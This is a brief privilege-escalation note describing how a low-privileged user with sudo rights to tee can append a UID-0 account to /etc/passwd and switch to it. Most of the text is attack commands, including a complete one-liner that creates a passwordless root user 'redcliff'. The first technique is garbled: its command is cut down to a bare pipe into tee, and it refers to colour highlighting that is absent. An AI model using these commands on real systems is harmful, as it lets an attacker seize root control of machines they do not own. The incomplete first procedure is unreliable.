Two techniques listed, first one presupposes an ssh connection with a low priv user that can run /usr/bin/tee, second one is a standalone chain
a)Create a Sha-512 encrypted password (on kali)
mkpasswd -m sha-512 password123
b)run this command to specify the file you want to overwrite, in this case the /etc/passwd file
| sudo tee -a "$LFILE"
purple is the sha-512 encrypted password
red is the file to write to
green is the new user (redcliff)
c) once you trigger the exploit just switch user using the decrypted sha-512 password (redcliff)
su redcliff (the new user) password: password123 (previously encrypted)
We can simply add a user in the /etc/passwd without any password and have that user root.
Something like redcliff::0:0:::/bin/sh
echo "redcliff::0:0:::/bin/sh" | sudo tee -a /etc/passwd
su redcliff
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